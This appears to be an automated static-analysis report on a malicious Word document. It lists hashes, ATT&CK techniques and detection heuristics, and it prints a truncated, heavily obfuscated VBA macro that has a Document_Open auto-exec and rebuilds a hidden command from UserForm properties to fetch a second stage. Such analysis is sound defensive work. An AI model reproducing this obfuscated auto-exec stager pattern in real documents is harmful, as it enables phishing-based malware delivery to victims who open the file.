Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 75b3e8ecff0075db…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 205.6 KB
Created: 2019-12-19 21:05:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: ab1385b5711ba0a53974214110428fc8
SHA-1: 36bceb99f72540e1e432e13156260f89ba6b1370
SHA-256: 75b3e8ecff0075dbf1714a95d4316d9a56ada3547050ffc8a9035ca531ff6460
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open auto-exec macro, a common technique for initial execution. The heuristics indicate a hidden command stager: the macro creates a COM object via CreateObject and GetObject and reassembles its command text from hidden UserForm properties, which suggests that its primary purpose is to download and execute a second-stage payload. No specific family could be identified because of the heavy obfuscation.

Heuristics (7)

  • VBA macros detected (severity: medium; 5 related findings; rule OLE_VBA_MACROS)
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager (severity: critical; rule OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER)
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  • Document_Open macro (severity: high; rule OLE_VBA_DOCOPEN)
    Document_Open macro
  • CreateObject call (severity: high; rule OLE_VBA_CREATEOBJ)
    CreateObject call
  • GetObject call (severity: high; rule OLE_VBA_GETOBJ)
    GetObject call
  • VBA p-code auto-exec with execution tokens (severity: high; rule OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL (severity: info; rule EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13392 bytes
SHA-256: 38cf4d50ecacb7d0bb242c2364b2b05e7317bc4599d558f8ffd0427ddb2f8fe3

Preview of script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Ruvkgjsqtr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Hezfrszq, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Skycwkpci = "Cora"
Dim Ywmkoflfue As String
Dim Tcyqtmnmljjkd As Boolean
Rmspslkbhki = ("Mario")
Dim Rvnawlezxt As Boolean
Dim Vizpnchfqtt As String
Dim Eojbqgkucuq As Integer
Ordpusxzxc = Uibmtycllr
Dim Ygnkvsnitdnp As String
Zadohlyp = ("Sint et modi culpa consequuntur explicabo temporibus.")
Dim Jhiwokxwuiqne As Double
Dim Eocsqulks As String
Dim Hxklxikp As Double
Kqtifqvtkmv = "Provident facere error."
Dim Cwvwgdywqx As Boolean
Dim Amjkhcpm As Integer
Dim Xijkdqrhmfrn As Integer
Bmelcqttggf = ("Ex rerum cum at.")
Dim Icjfetiymm As String
Ifilhlne = 673
Vyejaaecdf = Jfdzmtzp
Jlulliyu = 980
Bmahzapaao
   Gwnnqgygmwrmx = "Stacy"
Dim Ysskxfckhnefe As Double
Dim Ayfemaslk As Double
Dttrvvpkrlcy = ("Delectus.")
Dim Dmgzlautdvsg As String
Dim Xggipebjrp As String
Dim Ptwwyzekio As Integer
Yuykpxyodd = Ftjwsuvqhc
Dim Whxtcidi As Double
Jvgqttrdgmgl = ("Sherry")
Dim Qhrntvewj As Boolean
Dim Izfmvzepkjn As Integer
Dim Abyewyuk As Boolean
Cvqqozrnlicl = "Doris"
Dim Qlmbwhucqp As Double
Dim Wzzlddsgcrej As Integer
Dim Swcizohnnll As Double
Iyaebcwcrnz = ("Repellat voluptatibus libero ut et quis cumque minus.")
Dim Tnizgdlfoyaip As String
Jmoalojhcn = 870
Tobicdaut = Eigiuaavmel
Zzslkfgld = 691
End Sub

Attribute VB_Name = "Utrxlvrcwebx"
Attribute VB_Base = "0{44902B8D-FE4B-40A4-A71A-5DFA625349E6}{AF1793FC-1227-4761-AB84-326CC0CA1598}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Qowdfpxoitqoe"
Function Nvoyfforo()
   Orpfwvwxinwx = "Ducimus saepe tempore voluptatum qui delectus consequatur."
Dim Opqvyigw As Integer
Dim Yhadzwmloaa As Double
Mxxzroyzayf = ("Est id explicabo iusto.")
Dim Wzqbksxbhout As Integer
Dim Aljrzeadxb As Boolean
Dim Hvnyivefznu As Double
Imnficftcxo = Fuutborvk
Dim Jgzosnmqxcr As Integer
Ypzdvexyhb = ("Ab id et quos.")
Dim Kgmfutxjzw As Integer
Dim Rapkxten As Boolean
Dim Ulpoafepb As Integer
Eigalciuim = "Rerum."
Dim Vmupnbowchc As Double
Dim Pgtrejuw As Integer
Dim Sijmqvtuvry As Boolean
Gqronigx = ("Enim.")
Dim Avwpcdciqbzb As Boolean
Oyainhtc = 688
Mbnuhooqn = Rtgrqsjhsc
Oaohxjybxz = 107
Mxlvbkqxgs = Ruvkgjsqtr.Hezfrszq
   Itktfviwlihh = "Et."
Dim Liqshnyhwfpfo As Boolean
Dim Hdgovaaljtmzi As Double
Tpgcdpryv = ("Micheal")
Dim Bxedzgszefbt As Double
Dim Kwgzuopqomzzm As Boolean
Dim Pelycydhf As Double
Gimcrwfcs = Zabdljseat
Dim Pbquybgpbfoi As Integer
Lvcuktoe = ("Cupiditate expedita.")
Dim Wynuobtmzp As Double
Dim Bcgbmcjt As Integer
Dim Whxxbgjmekwg As String
Nmbzmbir = "Delectus quam."
Dim Tanjhlulxc As Integer
Dim Wramdmlmf As Integer
Dim Fnzbkgll As String
Mdbsafsq = ("Sunt iure ut.")
Dim Vyipkzzyv As Integer
Fyxhwhkjemrx = 20
Nzudhtwumh = Krlgnpyih
Kexhggve = 196
Vfoktdxt = Mxlvbkqxgs + Utrxlvrcwebx.Kfgmtxjpok + Utrxlvrcwebx.Frmtpwekuc + Utrxlvrcwebx.Yqiuhqigvwmvg
   Amjxievzf = "Dolorum aut."
Dim Iggwwlfx As Integer
Dim Ruhpunod As Boolean
Uvyujvdy = ("Soluta ut quia.")
Dim Mmcpphol As Double
Dim Djueisbh As Boolean
Dim Gvqnimhmnbhh As Boolean
Pfrsznydbmxka = Quvkctrvoh
Dim Cxbuwfxpdajha As String
Ueqymnzw = ("A incidunt.")
Dim Wcdxjclxnv As Integer
Dim Sbedejqlnjipw As Integer
Dim Jqlcbvizdurtx As Boolean
Nxxulotijq = "Jared"
Dim Ymtnbrecgbse As Double
Dim Bajmpsndwl As Integer
Dim Gjpicmva As Double
Kgqctvelet = ("Sunt rerum perspiciatis.")
Dim Nszwanhu As Boolean
Vzlumxzgi = 480
Oqdwnzry = Ylgwwiflh
Wckqrzjgmxl = 989
Bgksabrr = Vfoktdxt + Utrxlvrcwebx.Nddadnpnghp + Utrxlvrcwebx.Sulyqhueyptu.Factoid
   Kyozfgcx = "Est odit rem.
... (truncated)